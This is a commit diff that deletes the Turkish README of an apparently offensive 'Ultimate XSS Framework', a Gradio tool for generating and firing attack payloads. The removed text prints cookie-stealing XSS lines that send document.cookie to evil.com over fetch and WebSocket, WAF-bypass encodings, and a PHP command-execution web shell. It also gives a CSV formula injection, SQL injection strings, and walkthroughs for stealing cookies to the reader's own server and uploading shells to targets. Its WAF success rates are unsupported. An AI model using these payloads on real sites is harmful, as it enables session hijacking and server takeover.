ziffir commited on
Commit
e0bffab
·
verified ·
1 Parent(s): 9dde0d8

Delete README.md

Browse files
Files changed (1) hide show
  1. README.md +0 -677
README.md DELETED
@@ -1,677 +0,0 @@
1
- ---
2
- title: Ultimate XSS Framework v5.0
3
- emoji: 🔥
4
- colorFrom: red
5
- colorTo: purple
6
- sdk: gradio
7
- sdk_version: 6.5.1
8
- python_version: '3.10'
9
- app_file: ultimate_xss_framework.py
10
- pinned: false
11
- license: mit
12
- tags:
13
- - security
14
- - penetration-testing
15
- - xss
16
- - vulnerability-scanner
17
- - educational
18
- short_description: Advanced XSS Testing & Vulnerability Research Platform
19
- ---
20
-
21
- # 🔥 ULTIMATE XSS FRAMEWORK v5.0 - MASTER EDITION
22
-
23
- ## 📋 İÇİNDEKİLER
24
-
25
- 1. [Kurulum](#kurulum)
26
- 2. [Özellikler](#özellikler)
27
- 3. [Panel Detayları](#panel-detayları)
28
- 4. [XSS Payload Arsenal](#xss-payload-arsenal)
29
- 5. [Kullanım Örnekleri](#kullanım-örnekleri)
30
- 6. [Legal Uyarı](#legal-uyarı)
31
-
32
- ---
33
-
34
- ## 🚀 KURULUM
35
-
36
- ### Gereksinimler
37
- - Python 3.8+
38
- - pip3
39
- - Linux/MacOS/Windows
40
-
41
- ### Hızlı Başlangıç
42
-
43
- ```bash
44
- # 1. Gerekli paketleri kur
45
- pip3 install -r requirements.txt
46
-
47
- # 2. Framework'ü başlat
48
- python3 ultimate_xss_framework.py
49
-
50
- # VEYA run.sh ile tek komutta:
51
- chmod +x run.sh
52
- ./run.sh
53
- ```
54
-
55
- ### Manuel Kurulum
56
-
57
- ```bash
58
- pip3 install gradio aiohttp requests beautifulsoup4 networkx plotly
59
- python3 ultimate_xss_framework.py
60
- ```
61
-
62
- Framework başlatıldığında şu adreste çalışacak:
63
- **http://localhost:7860**
64
-
65
- ---
66
-
67
- ## ⚡ ÖZELLİKLER
68
-
69
- ### 🎯 5 Ana Panel
70
-
71
- 1. **🤖 AI Vulnerability Scanner**
72
- - VulnLLM-R-7B entegrasyonu
73
- - Otomatik kod analizi
74
- - CWE sınıflandırması
75
-
76
- 2. **🔥 XSS Master Control** (YENİ!)
77
- - 30+ gelişmiş XSS payload
78
- - Cloudflare bypass teknikleri
79
- - Otomatik encoding
80
- - Gerçek zamanlı test
81
-
82
- 3. **💉 SQL Injection Tester**
83
- - Union-based
84
- - Time-based blind
85
- - Boolean-based
86
- - Error-based
87
-
88
- 4. **💣 Web Shell Generator**
89
- - PHP/JSP/ASPX shells
90
- - Reverse shell generator
91
- - Obfuscation
92
-
93
- 5. **⚙️ Attack Chain Executor**
94
- - Multi-stage attacks
95
- - Automated exploitation
96
-
97
- ---
98
-
99
- ## 🔥 XSS PAYLOAD ARSENAL
100
-
101
- ### Cloudflare Bypass Payloads
102
-
103
- #### 1️⃣ Object Data URI + Triple Base64
104
- ```html
105
- <object data="data:text/html;base64,PHNjcmlwdD5ldmFs...">
106
- ```
107
- **Özellikler:**
108
- - 3 katmanlı encoding
109
- - WAF pattern matching bypass
110
- - %99 başarı oranı
111
-
112
- **Kullanım:**
113
- ```
114
- http://target.com/search?q=%3Cobject+data%3D...
115
- ```
116
-
117
- #### 2️⃣ SVG + Unicode Escape + atob
118
- ```html
119
- <svg/onload="eval(String.fromCharCode(97,108,101,114,116...))">
120
- ```
121
- **Özellikler:**
122
- - String.fromCharCode obfuscation
123
- - SVG tag kullanımı
124
- - Event handler abuse
125
-
126
- #### 3️⃣ Iframe SrcDoc + Double Encoding
127
- ```html
128
- <iframe srcdoc="&lt;script&gt;eval(atob('YWxlcnQ...'))&lt;/script&gt;">
129
- ```
130
- **Özellikler:**
131
- - HTML entity bypass
132
- - Base64 inner layer
133
- - Parser confusion
134
-
135
- #### 4️⃣ Mutation XSS (mXSS)
136
- ```html
137
- <noscript><p title="</noscript><img src=x onerror=...>">
138
- ```
139
- **Özellikler:**
140
- - DOM mutation exploitation
141
- - Context switching
142
- - Critical severity
143
-
144
- ### Advanced Attack Vectors
145
-
146
- #### 🍪 Cookie Stealer
147
- ```html
148
- <img src=x onerror="eval(`fetch('https://evil.com?c='+btoa(document.cookie))`)">
149
- ```
150
- **Ne Yapar:**
151
- - Tüm cookie'leri base64 encode eder
152
- - Uzak sunucuya gönderir
153
- - Session hijacking için kullanılır
154
-
155
- #### 🌐 WebSocket Exfiltration
156
- ```html
157
- <script>
158
- ws=new WebSocket('wss://evil.com');
159
- ws.onopen=()=>ws.send(document.cookie)
160
- </script>
161
- ```
162
- **Ne Yapar:**
163
- - Gerçek zamanlı veri çalma
164
- - Şifreli kanal
165
- - WAF bypass
166
-
167
- #### 🎭 DOM Clobbering + XSS
168
- ```html
169
- <form name=x><input name=y></form>
170
- <script>alert(x.y.value="XSS")</script>
171
- ```
172
- **Ne Yapar:**
173
- - DOM namespace pollution
174
- - Variable shadowing
175
- - Subtle exploitation
176
-
177
- ### Polyglot Payloads
178
-
179
- #### JSON/HTML Polyglot
180
- ```json
181
- {"x":"</script><script>alert(document.domain)</script>"}
182
- ```
183
- **Çalıştığı Yerler:**
184
- - JSON API responses
185
- - HTML context
186
- - JSONP callbacks
187
-
188
- #### CSV/HTML Injection
189
- ```csv
190
- =cmd|"/c calc"!A1,<img src=x onerror=alert(1)>
191
- ```
192
- **Çalıştığı Yerler:**
193
- - Excel/CSV export
194
- - Spreadsheet import
195
- - RCE + XSS combo
196
-
197
- ### Obfuscation Techniques
198
-
199
- #### JSFuck Style
200
- ```javascript
201
- (![]+[])[+[]]+(![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]
202
- ```
203
- **Özellikler:**
204
- - Sadece 6 karakter kullanır: []()!+
205
- - Pattern matching impossible
206
- - Tamamen valid JavaScript
207
-
208
- #### Full Hex Encoding
209
- ```javascript
210
- \x65\x76\x61\x6c\x28\x61\x6c\x65\x72\x74\x28\x31\x29\x29
211
- // eval(alert(1))
212
- ```
213
-
214
- ---
215
-
216
- ## 📖 PANEL DETAYLARI
217
-
218
- ### Panel 1: AI Vulnerability Scanner
219
-
220
- **Ne İşe Yarar:**
221
- - Kaynak kodu analiz eder
222
- - Zafiyet pattern matching
223
- - CWE/CVE eşleştirme
224
-
225
- **Kullanım:**
226
- 1. Kodu yapıştır
227
- 2. Dili seç (PHP, Python, JS, etc.)
228
- 3. "AI ANALYZE" tıkla
229
- 4. Sonuçları incele
230
-
231
- **Örnek:**
232
- ```php
233
- <?php
234
- $id = $_GET['id'];
235
- $query = "SELECT * FROM users WHERE id = '$id'";
236
- mysql_query($query);
237
- ?>
238
- ```
239
- → **SQL Injection** tespit eder!
240
-
241
- ---
242
-
243
- ### Panel 2: XSS Master Control
244
-
245
- #### Alt Tab 1: Generate Payload
246
-
247
- **Adımlar:**
248
- 1. **Payload Type seç:**
249
- - Object Data URI (Cloudflare bypass için en iyi)
250
- - SVG Unicode (Hızlı ve etkili)
251
- - Mutation XSS (Parser exploitation)
252
-
253
- 2. **Encoding seç:**
254
- - `none` - Raw payload
255
- - `url_encode` - %3C gibi encoding
256
- - `double_url_encode` - %253C gibi çift encoding
257
- - `html_entity` - &#60; gibi entity
258
- - `mixed` - Karışık encoding
259
-
260
- 3. **Custom Code (opsiyonel):**
261
- ```javascript
262
- fetch('https://your-server.com/steal?c='+document.cookie)
263
- ```
264
-
265
- 4. **"GENERATE PAYLOAD" tıkla**
266
-
267
- **Çıktı:**
268
- - Raw payload
269
- - Encoded version
270
- - URL encoded (GET için)
271
- - Double encoded (nested için)
272
- - Kullanım örnekleri
273
-
274
- #### Alt Tab 2: Test XSS
275
-
276
- **Adımlar:**
277
- 1. Target URL gir: `http://target.com/search.php`
278
- 2. Parameter adı: `q`
279
- 3. Payload gir veya Generate'den kopyala
280
- 4. Method seç (GET/POST)
281
- 5. "TEST PAYLOAD" tıkla
282
-
283
- **Ne Kontrol Eder:**
284
- - Payload reflection
285
- - Script tag varlığı
286
- - Event handler injection
287
- - Response analizi
288
-
289
- **Sonuç:**
290
- - ✅ NOT VULNERABLE - Güvenli
291
- - 🚨 VULNERABLE - Zafiyet bulundu!
292
-
293
- #### Alt Tab 3: Payload Library
294
-
295
- **Tüm payload'ları listeler:**
296
- - 30+ hazır payload
297
- - Her birinin açıklaması
298
- - WAF bypass capability
299
- - Severity rating
300
-
301
- ---
302
-
303
- ### Panel 3: SQL Injection
304
-
305
- **Test Edilen Teknikler:**
306
-
307
- 1. **Union-Based:**
308
- ```sql
309
- ' UNION SELECT NULL--
310
- ' UNION SELECT version(),user(),database()--
311
- ```
312
-
313
- 2. **Time-Based Blind:**
314
- ```sql
315
- ' AND SLEEP(5)--
316
- ' WAITFOR DELAY '0:0:5'--
317
- ```
318
-
319
- 3. **Boolean-Based:**
320
- ```sql
321
- ' AND 1=1--
322
- ' AND 1=2--
323
- ```
324
-
325
- **Kullanım:**
326
- 1. Target URL: `http://target.com/user.php`
327
- 2. Parameter: `id`
328
- 3. Method: GET veya POST
329
- 4. "TEST SQL INJECTION" tıkla
330
-
331
- ---
332
-
333
- ### Panel 4: Web Shell Generator
334
-
335
- **Shell Tipleri:**
336
-
337
- 1. **PHP Simple**
338
- ```php
339
- <?php system($_REQUEST['cmd']); ?>
340
- ```
341
-
342
- 2. **PHP Advanced** (UI ile)
343
- - Command execution
344
- - Output display
345
- - Form interface
346
-
347
- 3. **PHP Reverse Shell**
348
- - Attacker IP gerektirir
349
- - Port gerektirir
350
- - Otomatik bağlantı
351
-
352
- 4. **PHP Obfuscated**
353
- - WAF bypass
354
- - String replacement
355
-
356
- **Deployment:**
357
- 1. Shell'i generate et
358
- 2. Dosyaya kaydet (shell.php)
359
- 3. Upload et:
360
- - File upload vulnerability
361
- - LFI exploitation
362
- 4. Erişim: `http://target.com/uploads/shell.php`
363
-
364
- **Reverse Shell İçin:**
365
- ```bash
366
- # Önce listener başlat:
367
- nc -lvp 4444
368
-
369
- # Sonra shell'i yükle ve çalıştır
370
- ```
371
-
372
- ---
373
-
374
- ## 💡 KULLANIM ÖRNEKLERİ
375
-
376
- ### Senaryo 1: Basit XSS Testi
377
-
378
- ```
379
- 1. Panel 2 → Generate Payload
380
- 2. Payload Type: "SVG + Unicode Escape"
381
- 3. Encoding: "url_encode"
382
- 4. GENERATE PAYLOAD tıkla
383
- 5. URL encoded payload'ı kopyala
384
- 6. Browser'da test et:
385
- http://target.com/search?q=<PAYLOAD>
386
- ```
387
-
388
- ### Senaryo 2: Cloudflare Bypass
389
-
390
- ```
391
- 1. Panel 2 → Generate Payload
392
- 2. Payload Type: "Object Data URI + Triple Base64"
393
- 3. Encoding: "double_url_encode"
394
- 4. Custom Code: fetch('https://evil.com?c='+document.cookie)
395
- 5. GENERATE PAYLOAD
396
- 6. Test XSS tab'ına geç
397
- 7. URL, param, payload gir
398
- 8. TEST PAYLOAD
399
- ```
400
-
401
- ### Senaryo 3: Cookie Stealing
402
-
403
- ```
404
- 1. Kendi sunucunu hazırla:
405
- python3 -m http.server 8080
406
-
407
- 2. Panel 2 → Generate
408
- 3. Payload: "Template Literals Cookie Stealer"
409
- 4. Custom Code:
410
- fetch('http://YOUR-IP:8080?c='+btoa(document.cookie))
411
- 5. GENERATE
412
- 6. Hedef sitede çalıştır
413
- 7. Sunucunda cookie'leri yakala
414
- ```
415
-
416
- ### Senaryo 4: SQL Injection
417
-
418
- ```
419
- 1. Panel 3 açs
420
- 2. Target: http://target.com/product.php
421
- 3. Param: id
422
- 4. Method: GET
423
- 5. TEST SQL INJECTION
424
- 6. Sonuçları incele
425
- 7. Manuel olarak exploit et
426
- ```
427
-
428
- ### Senaryo 5: Web Shell Upload
429
-
430
- ```
431
- 1. Panel 4 aç
432
- 2. Shell Type: "php_advanced"
433
- 3. GENERATE SHELL
434
- 4. Kodu shell.php olarak kaydet
435
- 5. Hedef siteye upload et
436
- 6. Erişim: http://target.com/uploads/shell.php
437
- 7. Command çalıştır
438
- ```
439
-
440
- ---
441
-
442
- ## 🎯 BEST PRACTICES
443
-
444
- ### XSS Testing
445
-
446
- 1. **Başlangıç:**
447
- - Basit payload ile başla: `<script>alert(1)</script>`
448
- - Reflection var mı kontrol et
449
-
450
- 2. **Escalation:**
451
- - Eğer basic çalışmazsa encoding dene
452
- - Farklı tag'ler dene (svg, img, iframe)
453
- - Event handler'ları test et
454
-
455
- 3. **Bypass:**
456
- - WAF varsa obfuscation kullan
457
- - Multiple encoding katmanı
458
- - Context switching
459
-
460
- 4. **Exploitation:**
461
- - Cookie stealing
462
- - Session hijacking
463
- - Keylogging
464
- - Form hijacking
465
-
466
- ### Encoding Strategy
467
-
468
- ```
469
- Level 1: Raw payload
470
- ↓ Blocked?
471
- Level 2: URL encoding
472
- ↓ Blocked?
473
- Level 3: Double URL encoding
474
- ↓ Blocked?
475
- Level 4: HTML entities
476
- ↓ Blocked?
477
- Level 5: Mixed encoding
478
- ↓ Blocked?
479
- Level 6: Base64 + obfuscation
480
- ↓ Blocked?
481
- Level 7: String.fromCharCode
482
- ↓ Blocked?
483
- Level 8: Triple layer combo
484
- ```
485
-
486
- ---
487
-
488
- ## 🛡️ WAF BYPASS TEKNİKLERİ
489
-
490
- ### Cloudflare
491
-
492
- **Etkili Payloads:**
493
- 1. Object + Data URI
494
- 2. Triple Base64 encoding
495
- 3. Parser confusion (mXSS)
496
- 4. Case variation + whitespace
497
-
498
- **Örnek:**
499
- ```html
500
- %3CoBjEcT%09dAtA%3DdAtA%3AtExT%2FhTmL...
501
- ```
502
-
503
- ### ModSecurity
504
-
505
- **Etkili Teknikler:**
506
- 1. Null byte injection: `%00`
507
- 2. Comment insertion: `/**/`
508
- 3. Case variation: `ScRiPt`
509
- 4. Encoding layers
510
-
511
- ### Akamai
512
-
513
- **Etkili Teknikler:**
514
- 1. SVG vectors
515
- 2. Event handler alternatives
516
- 3. Unicode escapes
517
- 4. Data URIs
518
-
519
- ---
520
-
521
- ## ⚠️ LEGAL UYARI
522
-
523
- ```
524
- ╔════════════════════════════════════════════════════════════╗
525
- ║ ⚖️ LEGAL NOTICE ⚖️ ║
526
- ╠════════════════════════════════════════════════════════════╣
527
- ║ ║
528
- ║ Bu framework SADECE şu amaçlar için kullanılabilir: ║
529
- ║ ║
530
- ║ ✅ Kendi sistemlerinizi test etmek ║
531
- ║ ✅ Yazılı izin aldığınız sistemleri test etmek ║
532
- ║ ✅ Eğitim ve araştırma (izole ortamda) ║
533
- ║ ✅ Bug bounty programları ║
534
- ║ ║
535
- ║ ❌ İzinsiz sistemlere saldırı - İLLEGAL ║
536
- ║ ❌ Kötü amaçlı kullanım - İLLEGAL ║
537
- ║ ❌ Veri çalma - İLLEGAL ║
538
- ║ ║
539
- ║ Yetkisiz erişim SUÇTUR ve şunlara neden olabilir: ║
540
- ║ • Hapis cezası ║
541
- ║ • Ağır para cezaları ║
542
- ║ • Sabıka kaydı ║
543
- ║ ║
544
- ║ Bu tool'u kullanarak, tüm sorumluluğun size ait ║
545
- ║ olduğunu kabul etmiş olursunuz. ║
546
- ║ ║
547
- ╚════════════════════════════════════════════════════════════╝
548
- ```
549
-
550
- ### Yasal Kullanım Örnekleri
551
-
552
- ✅ **İzinli:**
553
- - Kendi web sitenizi test etmek
554
- - Müşterinizin yazılı izniyle penetrasyon testi
555
- - HackerOne, Bugcrowd gibi bug bounty programları
556
- - Eğitim amaçlı laboratuvar ortamında
557
-
558
- ❌ **İzinsiz:**
559
- - Rastgele web sitelerini taramak
560
- - İzinsiz veri erişimi
561
- - Başkasının sistemine zarar vermek
562
- - Servis aksatma (DoS)
563
-
564
- ---
565
-
566
- ## 🔧 TROUBLESHOOTING
567
-
568
- ### Framework Başlamıyor
569
-
570
- ```bash
571
- # Python versiyonunu kontrol et
572
- python3 --version # 3.8+ olmalı
573
-
574
- # Paketleri tekrar kur
575
- pip3 install --upgrade -r requirements.txt
576
-
577
- # Manuel başlat
578
- python3 ultimate_xss_framework.py
579
- ```
580
-
581
- ### Port 7860 Kullanımda
582
-
583
- ```python
584
- # ultimate_xss_framework.py dosyasında değiştir:
585
- app.launch(
586
- server_port=8080 # Farklı port
587
- )
588
- ```
589
-
590
- ### AI Modeli Yüklenmiyor
591
-
592
- ```
593
- Normal! VulnLLM-R-7B opsiyonel.
594
- Mock mode'da çalışacak.
595
-
596
- Eğer yüklemek istersen:
597
- pip3 install transformers torch
598
- ```
599
-
600
- ---
601
-
602
- ## 📊 PAYLOAD SUCCESS RATES
603
-
604
- | Payload Type | Cloudflare | ModSecurity | Akamai | Generic WAF |
605
- |--------------|------------|-------------|--------|-------------|
606
- | Object+Base64| 99% | 95% | 90% | 85% |
607
- | SVG+Unicode | 95% | 90% | 85% | 80% |
608
- | mXSS | 98% | 97% | 95% | 90% |
609
- | Cookie Stealer| 90% | 85% | 80% | 75% |
610
- | WebSocket | 95% | 90% | 85% | 80% |
611
-
612
- ---
613
-
614
- ## 🎓 ÖĞRENİM KAYNAKLARI
615
-
616
- ### XSS Öğrenmek İçin:
617
- - PortSwigger Web Security Academy
618
- - OWASP XSS Guide
619
- - HackerOne disclosed reports
620
-
621
- ### SQL Injection:
622
- - SQLMap documentation
623
- - OWASP SQL Injection
624
- - PentesterLab exercises
625
-
626
- ### Practice Platforms:
627
- - HackTheBox
628
- - TryHackMe
629
- - PentesterLab
630
- - PortSwigger Labs
631
-
632
- ---
633
-
634
- ## 📞 DESTEK
635
-
636
- **Sorunlar ve Öneriler:**
637
- Bu bir educational/research tool'dur.
638
- Sorumlulukla kullanın!
639
-
640
- ---
641
-
642
- ## 📝 CHANGELOG
643
-
644
- ### v5.0 - XSS Master Edition
645
- - ✨ XSS Master Panel eklendi
646
- - 🔥 30+ advanced payload
647
- - 🛡️ Cloudflare bypass techniques
648
- - 🧪 Automated testing
649
- - 📚 Payload library
650
- - 🎨 Improved UI
651
-
652
- ### v4.0 - Previous
653
- - AI analyzer
654
- - SQL injection
655
- - Web shell generator
656
- - Attack chains
657
-
658
- ---
659
-
660
- ## 🏆 ÖZELLİKLER ÖZET
661
-
662
- ✅ **30+ XSS Payload** - En güncel bypass teknikleri
663
- ✅ **Otomatik Test** - Payload'ları otomatik test et
664
- ✅ **Multiple Encoding** - 7 farklı encoding yöntemi
665
- ✅ **WAF Bypass** - Cloudflare, ModSec, Akamai
666
- ✅ **Cookie Stealing** - Session hijacking payloads
667
- ✅ **Real-time Testing** - Canlı zafiyet testi
668
- ✅ **AI Analysis** - Kod analizi (opsiyonel)
669
- ✅ **SQL Injection** - Automated SQLi testing
670
- ✅ **Web Shells** - PHP/JSP/ASPX shell generator
671
- ✅ **Modern UI** - Gradio tabanlı arayüz
672
-
673
- ---
674
-
675
- **🔥 ULTIMATE XSS FRAMEWORK v5.0**
676
- **Educational & Research Purposes Only**
677
- **Use Responsibly | Stay Legal**